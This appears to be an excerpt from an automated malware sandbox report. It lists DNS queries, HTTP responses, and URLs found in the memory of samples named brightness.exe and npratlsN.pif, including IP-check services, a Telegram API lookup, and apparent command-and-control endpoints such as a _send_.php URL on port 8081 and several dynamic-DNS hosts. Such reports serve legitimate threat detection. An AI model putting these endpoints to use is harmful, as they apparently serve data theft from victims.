Source: global traffic	DNS traffic detected: DNS query: amazonenviro.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.irco.com.sa

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 07:08:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 07:08:48 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 14 Jan 2025 07:08:57 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B9EA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.00000000218FB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: brightness.exe, 00000004.00000002.1889917272.0000000021890000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1858000944.000000007F2CA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1856985915.0000000021F01000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1830836182.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000002.2087769696.0000000020588000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3461578929.0000000029B0E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B9FA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3472486775.000000002DDE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3454668828.000000001F991000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2599953394.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EAA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3466644450.000000002ED8D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://e6.i.lencr.org/0
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3461578929.0000000029B0E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B9FA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3472486775.000000002DDE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3454668828.000000001F991000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2599953394.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EAA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3466644450.000000002ED8D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://e6.o.lencr.org0
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B9EA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.irco.com.sa
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: brightness.exe, 00000004.00000002.1889917272.0000000021890000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1858000944.000000007F2CA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1856985915.0000000021F01000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1830836182.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000002.2087769696.0000000020588000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.dr	String found in binary or memory: http://ocsp.comodoca.com0$
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: brightness.exe, 00000004.00000002.1889917272.0000000021890000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1858000944.000000007F2CA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1856985915.0000000021F01000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1830836182.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890574991.0000000021FAB000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000002.2087769696.0000000020588000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.dr	String found in binary or memory: http://www.pmail.com0
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3461578929.0000000029B0E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B9FA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3472486775.000000002DDE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3454668828.000000001F991000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2599953394.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EAA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3466644450.000000002ED8D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.
Source: npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3461578929.0000000029B0E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B9FA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3472486775.000000002DDE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3454668828.000000001F991000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2599953394.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EAA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3466644450.000000002ED8D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
